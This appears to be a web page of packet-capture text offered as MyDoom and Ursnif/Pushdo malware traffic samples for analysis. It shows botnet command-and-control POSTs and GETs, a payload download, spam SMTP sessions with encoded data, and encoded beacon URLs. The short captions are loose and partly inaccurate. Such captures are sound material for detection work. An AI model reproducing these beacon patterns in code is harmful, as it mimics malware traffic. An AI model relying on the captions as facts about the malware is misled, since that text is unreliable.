2019-07-25 13:05:47.646312 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [P.], seq 1:151, ack 1, win 64240, length 150: HTTP: POST /f5lkB/index.php HTTP/1.1
E…..@….c
..eS….!.P+..QZB..P…6V..POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

d1=1000101001&
2019-07-25 13:05:47.646371 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [.], ack 151, win 64240, length 0
E..(8……>S…
..e.P.!ZB..+…P…….
2019-07-25 13:05:47.662936 IP 10.7.25.101.49186 > 31.44.184.33.80: Flags [S], seq 291674496, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….3
..e.,.!.”.P.b…….. ……………..
2019-07-25 13:05:47.758694 IP 77.120.115.221.80 > 10.7.25.101.49183: Flags [FP.], seq 187, ack 154, win 64239, length 0
E..(8……~Mxs.
..e.P……….P…….
2019-07-25 13:05:47.758957 IP 10.7.25.101.49183 > 77.120.115.221.80: Flags [.], ack 188, win 64054, length 0
E..(..@….7
..eMxs….P……..P..6.D..
2019-07-25 13:05:47.763295 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [P.], seq 1:122, ack 201, win 64240, length 121: HTTP: HTTP/1.1 200 OK
E…8……..,.!
..e.P. .#.j[^b.P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Thu, 25 Jul 2019 21:05:22 GMT
Content-Length: 210944

2019-07-25 13:05:48.827934 IP 10.7.25.101.49187 > 31.44.184.33.80: Flags [P.], seq 1:368, ack 1, win 64240, length 367: HTTP: GET /visit.js HTTP/1.1
E….r@….5
..e.,.!.#.P….?t.5P….2..GET /visit.js HTTP/1.1
Accept: /
Cookie: D6CFR6fSx/2pSZ6OGAbt8JcWC6fjnf0iRH/lXdUuFoUeISeBOx4dHDkZGpLFCgSVAKGsc73GvXP0V+JT4J/NSi6vVSuEzjcFPy8q5lYtHAmcacE1cATGok6yawYmMTtyhx2I0swd+ECPu/GZEjnwuxElE6bQjaa4PTvKsU3FWt4=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache

MyDoom DDoS $38 Billion Dollar P2P Malware Botnet PCAP Download Traffic Sample

MyDoom Botnet

MyDoom has several methods of impacts, but main attacks are DDOS
MyDoom uses DGA for its P2P communications but also some Command and Control Server

Damage of an estimated $38.7 billion was caused by the fastest spreading malware Mydoom to Microsoft Windows-based computers. Spyware is a deadly malware that extracts a company’s confidential information without awareness of the company.

2019-07-15 13:00:22.289866 IP 10.7.15.101.51171 > 10.7.15.1.53: 48767+ MX? acm.org. (25)
E..5……..
..e
……5.!X…………..acm.org…..
2019-07-15 13:00:22.340366 IP 10.7.15.1.53 > 10.7.15.101.51171: 48767 1/0/0 MX mail.mailroute.net. 10 (59)
E..W…….G

..e.5…C……………acm.org………………
.mail mailroute.net.
2019-07-15 13:00:22.348650 IP 10.7.15.101.53658 > 10.7.15.1.53: 65013+ A? mail.mailroute.net. (36)
E..@……..
..e
……5.,$_………….mail mailroute.net…..
2019-07-15 13:00:22.382026 IP 10.7.15.1.53 > 10.7.15.101.53658: 65013 2/0/0 A 199.89.1.120, A 199.89.3.120 (68)
E.........= ... ..e.5...L...............mail mailroute.net..................Y.x.............Y.x 2019-07-15 13:00:22.382637 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [S], seq 3423424506, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4..@..... ..e.Y.x......O....... ................. 2019-07-15 13:00:22.501570 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [S.], seq 2591540629, ack 3423424507, win 64240, options [mss 1460], length 0 E..,......O..Y.x ..e.....w....O.…~…….
2019-07-15 13:00:22.501779 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 1, win 64240, length 0
E..(..@…..
..e.Y.x……O..w..P….j..
2019-07-15 13:00:22.824195 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [P.], seq 1:66, ack 1, win 64240, length 65: SMTP: 220-in-014.lax.mailroute.net ESMTP Postfix – Postscreen enabled
E..i……Ot.Y.x
..e…..w….O.P…5…220-in-014.lax.mailroute.net ESMTP Postfix – Postscreen enabled

2019-07-15 13:00:22.928682 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 66, win 64175, length 0
E..(..@…..
..e.Y.x……O..w..P….j..
2019-07-15 13:00:24.456432 IP 10.7.15.101.49164 > 157.130.29.226.1042: Flags [S], seq 824150712, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…%;
..e……..1……… ..I…………..
2019-07-15 13:00:24.924489 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
E..C…….}
..e
….L.5./…G………..lists.freedesktop.org…..
2019-07-15 13:00:24.988231 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
E..D…….{
..e
……5.0..Y…………global.libreoffice.org…..
2019-07-15 13:00:25.049108 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
E..D…….z
..e
……5.0……………global.libreoffice.org…..
2019-07-15 13:00:25.112279 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
E..D…….y
..e
……5.09..d………..documentfoundation.org…..
2019-07-15 13:00:25.174765 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
E..=……..
..e
……5.)[u.G………..libreoffice.org…..
2019-07-15 13:00:25.237468 IP 10.7.15.101.50685 > 10.7.15.1.53: 56734+ MX? libreoffice.org. (33)
E..=…….~
..e
……5.)……………libreoffice.org…..
2019-07-15 13:00:25.939540 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
E..C…….w
..e
….L.5./…G………..lists.freedesktop.org…..
2019-07-15 13:00:26.001128 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
E..D…….u
..e
……5.0..Y…………global.libreoffice.org…..
2019-07-15 13:00:26.062827 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
E..D…….t
..e
……5.0……………global.libreoffice.org…..
2019-07-15 13:00:26.126226 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
E..D…….s
..e
……5.09..d………..documentfoundation.org…..
2019-07-15 13:00:26.187392 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
E..=…….y
:
2019-07-15 13:00:30.460095 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 1:54, ack 1, win 64240, length 53: SMTP: 220 gabe.freedesktop.org ESMTP Postfix (Debian/GNU)
E..]…………
..e….]`.k…
P….h..220 gabe.freedesktop.org ESMTP Postfix (Debian/GNU)

2019-07-15 13:00:30.460605 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 1:15, ack 54, win 64187, length 14: SMTP: EHLO acm.org
E..6..@…..
..e………..
]`..P….T..EHLO acm.org

2019-07-15 13:00:30.460715 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 15, win 64240, length 0
E..(…………
..e….]......P....n.. 2019-07-15 13:00:30.541199 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [S.], seq 678655145, ack 2272612538, win 64240, options [mss 1460], length 0 E..,......y.Y.D. ..e....(st..uP.………..
2019-07-15 13:00:30.541436 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [.], ack 1, win 64240, length 0
E..(..@…A.
..eY.D……uP.(st.P….R..
2019-07-15 13:00:30.601674 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 54:197, ack 15, win 64240, length 143: SMTP: 250-gabe.freedesktop.org
E……….?….
..e….]`……P…%]..250-gabe.freedesktop.org
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:30.602630 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 15:43, ack 197, win 64044, length 28: SMTP: MAIL FROM:fdrake@acm.org
E..D..@…..
..e…………]`./P..,QQ..MAIL FROM:fdrake@acm.org

2019-07-15 13:00:30.602753 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 43, win 64240, length 0
E..(…………
..e….]./...4P....... 2019-07-15 13:00:30.735767 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 197:211, ack 43, win 64240, length 14: SMTP: 250 2.1.0 Ok E..6............ ..e....]./…4P…nf..250 2.1.0 Ok

2019-07-15 13:00:30.736105 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 43:88, ack 211, win 64030, length 45: SMTP: RCPT TO:libreoffice@lists.freedesktop.org
E..U..@…..
..e………..4]`.=P…….RCPT TO:libreoffice@lists.freedesktop.org

2019-07-15 13:00:30.736205 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 88, win 64240, length 0
E..(…………
..e….]`.=…aP…….
2019-07-15 13:00:31.087379 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 1:62, ack 1, win 64240, length 61: SMTP: 220 vm194.documentfoundation.org ESMTP Postfix (Debian/GNU)
E..e……y.Y.D.
..e….(st..uP.P…….220 vm194.documentfoundation.org ESMTP Postfix (Debian/GNU)

2019-07-15 13:00:31.087804 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 1:30, ack 62, win 64179, length 29: SMTP: EHLO global.libreoffice.org
E..E..@…A.
..eY.D……uP.(st.P….l..EHLO global.libreoffice.org

2019-07-15 13:00:31.087907 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 30, win 64240, length 0
E..(……y.Y.D.
..e….(st..uP.P…….
2019-07-15 13:00:31.270207 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 62:203, ack 30, win 64240, length 141: SMTP: 250-vm194.documentfoundation.org
E………y9Y.D.
..e….(st..uP.P…….250-vm194.documentfoundation.org
250-PIPELINING
250-SIZE 41943040
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:31.271261 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 30:77, ack 203, win 64038, length 47: SMTP: MAIL FROM:postmaster@global.libreoffice.org
E..W..@…A.
..eY.D……uP.(sutP..&….MAIL FROM:postmaster@global.libreoffice.org

2019-07-15 13:00:31.271380 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 77, win 64240, length 0
E..(……y.Y.D.
..e….(sut.uQ.P….<.. 2019-07-15 13:00:31.481963 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 203:217, ack 77, win 64240, length 14: SMTP: 250 2.1.0 Ok
E..6……y.Y.D.
..e….(sut.uQ.P…s…250 2.1.0 Ok

2019-07-15 13:00:31.482279 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 77:121, ack 217, win 64024, length 44: SMTP: RCPT TO:marketing@global.libreoffice.org
E..T..@…A.
..eY.D……uQ.(su.P….2..RCPT TO:marketing@global.libreoffice.org

2019-07-15 13:00:31.482382 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 121, win 64240, length 0
E..(……y.Y.D.
..e….(su..uQ2P…….
2019-07-15 13:00:31.686040 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 217:291, ack 121, win 64240, length 74: SMTP: 450 4.7.25 Client host rejected: cannot find your hostname, [173.46.3.9]
E..r……yxY.D.
..e….(su..uQ2P….e..450 4.7.25 Client host rejected: cannot find your hostname, [173.46.3.9]
2019-07-15 13:01:10.499434 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15417, win 64240, length 0
E..(……48.F(g
..e…;….D…P…]…
2019-07-15 13:01:10.499471 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15417:15490, ack 277, win 63964, length 73: SMTP: CsT9qUFJrxQMiBqS5+ujrJr2AxIIs09LsG+iA3CPkMqtdS2sgcamxnnGrtA4ivDGLtbED1P
E..q.*@….C
..e.F(g.;..D…….P…….CsT9qUFJrxQMiBqS5+ujrJr2AxIIs09LsG+iA3CPkMqtdS2sgcamxnnGrtA4ivDGLtbED1P

2019-07-15 13:01:10.499509 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15490, win 64240, length 0
E..(……47.F(g
..e…;….D..5P…]z..
2019-07-15 13:01:10.499581 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15490:15568, ack 277, win 63964, length 78: SMTP: E7QcAFvXa9SwaF1MA+25XC6Xb+5j72HwbPEgNsvlcvJT82X0dPX2abBcLrdR9274Z/lz+rkty1Y9
E..v.+@….=
..e.F(g.;..D..5….P…FB..E7QcAFvXa9SwaF1MA+25XC6Xb+5j72HwbPEgNsvlcvJT82X0dPX2abBcLrdR9274Z/lz+rkty1Y9

2019-07-15 13:01:10.499614 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15568, win 64240, length 0
E..(……46.F(g
..e…;….D…P…],..
2019-07-15 13:01:10.499657 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15568:15646, ack 277, win 63964, length 78: SMTP: VGVtRtNw2zXLZtTVctbXB9h5Stc122bZ2kk629xG3S9X13Vd3hvfD+AL4RPixF3TNE3j5OXm52Lo
E..v.,@….<
..e.F(g.;..D…….P….*..VGVtRtNw2zXLZtTVctbXB9h5Stc122bZ2kk629xG3S9X13Vd3hvfD+AL4RPixF3TNE3j5OXm52Lo

2019-07-15 13:01:10.499691 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15646, win 64240, length 0
E..(……45.F(g
..e…;….D…P……
2019-07-15 13:01:10.499734 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15646:15724, ack 277, win 63964, length 78: SMTP: ayRiB6m+hApMrsThtQk5GBJlW44m81qQKIQEp2QE4j0jTGYk/2GSAblMTNfzYTeCklCW7FAxj2Rb
E..v.-@….;
..e.F(g.;..D…….P….O..ayRiB6m+hApMrsThtQk5GBJlW44m81qQKIQEp2QE4j0jTGYk/2GSAblMTNfzYTeCklCW7FAxj2Rb

2019-07-15 13:01:10.499767 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15724, win 64240, length 0
E..(……44.F(g
..e…;….D…P……
2019-07-15 13:01:10.499810 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15724:15803, ack 277, win 63964, length 79: SMTP: 2NcgGtBqBSLnY giJR0CBABxailQGXkwC0KBXZVbPzoFEy/y8ip3S5Nl4Dcv9kIc7Nsh3/GkPxg5D
E..w..@….9
..e.F(g.;..D…….P…l…2NcgGtBqBSLnY giJR0CBABxailQGXkwC0KBXZVbPzoFEy/y8ip3S5Nl4Dcv9kIc7Nsh3/GkPxg5D

2019-07-15 13:01:10.499843 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15803, win 64240, length 0
E..(……43.F(g
..e…;….D..nP…\A..
2019-07-15 13:01:10.499885 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15803:15852, ack 277, win 63964, length 49: SMTP: Wd5SdLNn/C0eKzCNUzbpLcJolBHSO1nx/hqx/g+lBVp+vKY
E..Y./@….V
..e.F(g.;..D..n….P…….Wd5SdLNn/C0eKzCNUzbpLcJolBHSO1nx/hqx/g+lBVp+vKY

2019-07-15 13:01:10.499919 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15852, win 64240, length 0
E..(……42.F(g
..e…;….D…P……
2019-07-15 13:01:10.499962 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15852:15874, ack 277, win 63964, length 22: SMTP: WwwouqTVQl4axZk+9NR8
E..>.0@….p
..e.F(g.;..D…….P….s..WwwouqTVQl4axZk+9NR8

2019-07-15 13:01:10.499995 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15874, win 64240, length 0
E..(……41.F(g
..e…;….D…P…[…
2019-07-15 13:01:10.500037 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15874:15886, ack 277, win 63964, length 12: SMTP: fFly N+umw
E..4.1@….y
..e.F(g.;..D…….P…….fFly N+umw

Ursnif and Pushdo Trojan DDoS Botnet Malware Infection PCAP file download traffic sample

2019-07-29 12:48:13.981152 IP 10.7.29.101.49158 > 185.244.213.113.443: Flags [P.], seq 1:118, ack 1, win 64240, length 117
E….]@…C,
..e…q….r.Z…..P………..p…l..]=…A..}}.5T+…M%…$…Lr*,.6…./.5…
….. .
.2.8…….+…………..riuytessl.xyz.
…………..
2019-07-29 12:48:13.981273 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [.], ack 118, win 64240, length 0
E..(…….t…q
..e……..r.Z.P…EP..
2019-07-29 12:48:14.192305 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [P.], seq 1:1383, ack 118, win 64240, length 1382
E…………..q
..e……..r.Z.P………..]…Y..]?#Ny.8…..-…. i………!a.. .BAB…..i.PQ.?Qa&..K….’.6z…………………………………i0..e0..M……..y@.TCg.,..Xc.oo
.0.. *.H……..0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30…190719142342Z..191017142342Z0.1.0…U….riuytessl.xyz0..”0.. .H………….0.. ……….(C.9.U.k…..j.C.U.6..|a….k…M.. …...”q….O..q..V.g4.k.i….:?….(……………….+G..I.u..]k..3…..<….au..].L’xLh…..#9q.r.k……?.fCib..4[}P……p……Y.U..y.:..i……p..Zt5s}. .z]A@azl.t..D..X….dVU..Rcp.o.l!..^,.1.1…q…….Mn.. ..Vl..5…….U0S’.y?…….>hr…7…..=.. .k!TS_n.UE#N……F.dvi…ws….Q….#\PT.06…..+1.Y.g.?W.o-…#%,[..U….P.7….DMe…….|e.Z..-0….F9H….j./…Zj.]… VJ…~.ayy..Ny;h.u.i.’.{U3$c…………&.5c|……6……9. …..X.)py.………….u0..q0…U………..0…U.%..0…+………+…….0…U…….0.0…U……:.$’.UF.W.x.*.h&….0…U.#..0….Jjc.}….9..Ee…..0o..+……..c0a0…+…..0..”http://ocsp.int-x3.letsencrypt.org0/..+…..0..#http://cert.int-x3.letsencrypt.org/0+..U…$0″..riuytessl.xyz..www.riuytessl.xyz0L..U. .E0C0…g…..07..+……….0(0&..+………http://cps.letsencrypt.org0…. +…..y…………v.oSv.1.1…..Q..w…….)…..7…..l ..c…..G0E.!…..T..X.LB……..~Z.…V….. .+/.|Ri.e….5.…vO..w../.]….v.) 10.7.29.101.49158: Flags [.], seq 1383:2843, ack 118, win 64240, length 1460
E…………..q
..e…….xr.Z.P…….r……EG.x…l
..>…..G0E.!…..lh…..F…P…….w..<.l0… T<..y..T.2Q +..Q.p…3_>.#%.z!.E0.. *.H………….Q.>=-J..’p.!.7W……X..q.WTx…..i8<...kc6…….D.O…….3…>…i.RRx.5<.….]../..1.T..A f..&..4.Q…:.6j.NR…./x.9….J…5Me..V}h..e….=.G….{………d.O….3E.?.VG..e0……1…..$…?.bp..Gw…h..).., mZ3…….!;.X…Q/..d…y…|…f….o…0…0..z…….
.AB…S.sj…..0.. *.H……..0?1$0″..U.
..Digital Signature Trust Co.1.0…U….DST Root CA X30…160317164046Z..210317164046Z0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30..”0.. *.H………….0..
………Z..G.r]7..hc0..5&.%…5.p./..KA….5.X...h….u….bq.y........xgq.i........B…tg…..Ra..?e…….V…..?…….k…}.+.e…6u.k.J…Ix/..O* %)..t..1..18….3.C….0..y1.=-6….3j.91……d.3…)…..}……….}0..y0…U…….0…….0…U………..0…+……..s0q02..+…..0..&http://isrg.trustid.ocsp.identrust.com0;..+…..0../http://apps.identrust.com/roots/dstrootcax3.p7c0…U.#..0…….{,q…K.u…`…0T..U. .M0K0…g…..0?..+……….000…+……..”http://cps.root-x1.letsencrypt.org0<..U…50301./.-.+http://crl.identrust.com/DSTROOTCAX3CRL.crl0…U…….Jjc.}….9..Ee…..0.. .H…………..3…cX8…. U.vV.pH.iG'{.$…Z.J.)7$tQ.bh…pg….N(Q………Z……j.j.>W#….b…….?. H….eb..T… ………2…w..ye.+.(.:.R..R.._….3.wl.@.2…\A.tl[]

2019-07-29 12:52:10.719361 IP 10.7.29.101.49161 > 40.76.4.15.80: Flags [P.], seq 1:458, ack 1, win 64240, length 457: HTTP: GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
E….*@…..
..e(L… .P.YQ.8.+9P…7F..GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko/20100101 Firefox/12.0
Accept-Encoding: gzip, deflate
Host: microsoft.com
DNT: 1
Connection: Keep-Alive

2019-07-29 12:52:10.719447 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [.], ack 458, win 64240, length 0
E..(……Aw(L..
..e.P. 8.+9.YS.P…….
2019-07-29 12:52:10.807321 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [P.], seq 1:325, ack 458, win 64240, length 324: HTTP: HTTP/1.1 301 Moved Permanently
E..l……@2(L..
..e.P. 8.+9.YS.P…….HTTP/1.1 301 Moved Permanently
Date: Mon, 29 Jul 2019 16:52:10 GMT
Server: Kestrel
Content-Length: 0
Location: https://www.microsoft.com/images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi

2019-07-29 12:53:39.848186 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1:438, ack 1, win 64240, length 437: HTTP: GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
E…..@…
}
..e…..R.P..V_q5s8P…K…GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:39.848277 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 438, win 64240, length 0
E..(…………
..e.P.Rq5s8..X.P…2…
2019-07-29 12:53:40.046606 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [P.], seq 1:1383, ack 438, win 64240, length 1382: HTTP: HTTP/1.1 200 OK
E……….2….
..e.P.Rq5s8..X.P…P…HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:14 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=i52pvsrt089bi7i3umb88bd400; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:14 GMT; path=/; domain=.irwhfgowe.xyz
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

355bc
07rwzN1wxvCWd3rBZRqevWWzLIsTvybdCsmwzeaaULAyy2Vy5oxxe1cX92MOCxC3ZQTo+1KHvKoqvNbCRp1xBSQZTNLReURGb8kNYH3+8JtR8xL9OmBF7Sm/4WIsuKzpacR1VqJIEIpbeNx3KLC8sqndJlMp07IoHValNX47uHFm2hY9H28QPgnMGW+y9HkcEMwdFh+E3yHoii4dzyrQnnpFFowy7pEoy1GQO5EW5bz2uxuUSAK3qJyHs5kVuNTpQP0qKUc9EjlEPFRjKCajoaxKEWSPD+f/45g1i9cS2dIGrp3t/IgmKbTYOLte8un43nqCF4gLuN5SV0ONquYbjiqVdU38jEYkwcxmgWnXlKoLGw3rSLlac1VA8oYQ7d/5KgBKPbCf6gJ+dyTcqSPQ9Spaiz5Dq69spM35RwwgGB2rGBAncEha02GnOidGumIJx+If+d0NJyTd51Q2dFLqGzg5WiQGQo+udLo7vaI/KUvvObs+1io0BRFa2X+rAbzGx6sLk4fI9ts/9IemiGl+szT83n4mExS1zP5QI8in/b0Qy79VKc1R3mYvm/J0GM6HJem8IJFH5BJqjrCOMerjG1hg6QSXk5AVOTIGezTaUMGVY5o+JvaDRxcOv/zhRKIx5qpeTYd+u2gExUdiOOMj7hqHAWn1DS0KiUJ7cjvniv+0En98QSv3wbZOO8ksFLa5new6152uNXX5lC2lAk/NgwHOWmt7cN074ASQ0GTAcoGsGRDL1WLTcZ7SNu8SUGIIo55/M7y7Ag4ITRqB95grEqHAtCNhliKrOEy1bn4GpZ9NG2Do2W
2019-07-29 12:53:40.046704 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [.], ack 1383, win 62858, length 0
E..(..@….0
..e…..R.P..X.q5x.P…2…
2019-07-29 12:53:40.048505 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 1383:2843, ack 438, win 64240, length 1460: HTTP
E……………
..e.P.Rq5x…X.P…H;..+QWA0tM0QdVuPkhswOFzlmPHTuY9CN2QDsWi1bIKzwR6vkhZ7KAwMVY1i48tC164mEm0z0RZNf+IrD3TPDZU5mRtCAqPy/I1zqVQaeBPpHhJwl+YI20OIHCOPQg94BqaoFvWP6ArUig5deAw5awc0Xts9xFKYpUGKmEC0nGwqHQP3UBzpcIvlrSTYLwh3/MtpScYFthdHNb/bld1mXgaGAZ5E6m0Tj4yVcrZSvFi+CNIrIsNhK9RIVbl9Ij3MeRiXBLXoabyasQ+tPADbSrKe+QgVog2pEtsi1XzNXvd0OFjkLfmduBJm/3GQZsjUczuEUF2vCPq0v6vzqqAuDGs1fwCcqe9j1vnzH8Msf+ElPuMloNmSBkdUloQMDJbKbskU5D00aW/DAh/MyzVoh496ITtuywkrC1hFf6bLRucFXSqL/IWjxK8n+LsEsoKxCYnd5MjlPnN7B6FrQg4BS6A4V9BLg8wDOp1hY/aNO/gSnnzcxoBWru+QrXQ+8iWoqv90qyEg9XNo/FwGHle7/3Uo1ES0lffJYr0lINt59NvSSNUaTgHItVymhKNOhPehcLPhHeHYI/g+/AIBpc92VIQLHzF3qe3kOLfQnUe8+AgI4sPKcpgPrNTdJ8alc/OTYDrcPLoLIS9cR5MH1kLuTZFgnFRFbwVnSZBn9Kd9LyUWjwWxH8wNJ3FYwyEMFszvvuucEqgTz8j2THI82rKE42DFtRG3uoH3FbToEnYVfUhBYe/NLyjgeMR38DVP3D4NxGcK64otXkReWSRU8YB7yUD7Y1jokacBnOPhnCdB5C3XJNcsPukxmHpCSg2pO3XOBxe2i+3iTUIIOGZtyhFKE5fkXcDmF0kS4vKakFkWC3TOYKT1kfidos6AU49cBx2OCIi+4KymAGygCmX5LiUbjZDT53qE12p7nFFPQou5/OwCHqUZLxw2zKOuCaSWzDfnfulRNe+V0ZjDCun794hdPLUXbX4SSTcaXcjwDSL+NFKFQ1L+eAaSGc9xlY+8LxzstSs7BWSMtPm3fGbKfEClnSLZOK2jhDJNgqbx9Bfil/6pkI3SoIL5g76ezoHhJUoDSzk70NJdSXoDMnXcP/FOjQzTGgHmDLIH1lpcBlC9baxvXK8a8N2ip33O+1iSyjBZ6hTLPdVTbmk9Xg0pz7Q5dhJ4IBEPQ9eo+xlm+CHI9ZAYQ7h01Kzvialrsfe+8ilK+aNZ6PDpN74yqn8CnsS5xazdBEKG7n2jXPRl+FOxsGVE0luECxROi/K/rHf76pNTsS+6N67jydO+HMvrpXAXvPHZQkQ9lkdjwPqbEubmReoPl4AyE7ksSS1ZOgnqsv6zgQePZkSCuIbN6MWfnMg5h1IjaV4IWTKwhZDUCgaqBRrPtEepmhL3fQ5TlAsF+6xbGFzx3nsAUlOB/k5Id